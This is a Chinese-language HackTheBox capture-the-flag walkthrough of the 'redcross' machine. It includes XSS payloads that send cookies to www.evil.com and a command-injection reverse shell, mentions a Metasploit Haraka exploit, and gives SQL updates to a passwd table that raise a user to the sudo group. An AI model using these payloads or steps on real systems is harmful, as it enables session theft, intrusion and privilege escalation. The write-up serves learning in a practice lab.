redcross-HTB靶机渗透

user.txt

nmap开路,目标开放22端口,80端口和443端口。将redcross.htb加入/etc/hosts文件。来到登录窗口,点击conntact form,来到留言界面,猜测需要通过xss获取cookie。有过滤,在contact mail or phone处触发xss

1
2
3
<script>document.location="http://www.evil.com/cookie.asp?cookie="+document.cookie

new Image().src="http://www.evil.com/cookie.asp?cookie="+document.cookie</script>

得到cookie
cookie

修改cookie,地址栏回车,来到后台页面。从留言来看,得知存在admin webpanel页面。下方有检索UserID的选项,可以使用%通配符获取所有消息。
admin

一通扫描,发现子域名admin.redcross.htb,也需要加入hosts。使用之前打到的cookie成功登录,有两个功能,一个添加用户,一个是添加防火墙白名单。
adminpanel

添加用户,登录,发现是在/var/jail/home中,果断放弃(摊手.jpg)

在防火墙删除IP处发现命令注入漏洞,反弹shell。获得www-data权限
command

actions.php文件中发现PostgreSQL数据密码。但是无法获取user.txt文件,也无法连接数据库。
psql

/home/penelope/文件夹下发现有个haraka文件夹,貌似是个邮件应用,存在漏洞

这里用msf获取shell,配置好,得到user.txt
msf

root.txt

使用之前的msf得到的shell修改tokyo用户的uid和gid,注意这里的uid和git不能设置为root,需要设置为sudo。
tokyoc

1
2
3
4
5
6
7
penelope@redcross:/var/www/html/admin/pages$ psql -U unixusrmgr -d unix -h 127.0.0.1 -p 5432
<es$ psql -U unixusrmgr -d unix -h 127.0.0.1 -p 5432
Password for user unixusrmgr: ******

psql (9.6.7)
SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)
Type "help" for help.

psql2
只有passed_table能修改,修改之前添加的用户的权限和home目录,命令如下:

1
2
3
4
\d #命令列出所有数据库
select * from passwd_table;
update passwd_table set gid=27 where uid=2031;
update passwd_table set homedir = '/home' where uid = 2031;

无法直接打开root.txt,需要sudo su切换su

root

至此,拿到root.txt

参考:http://www.ruanyifeng.com/blog/2013/12/getting_started_with_postgresql.html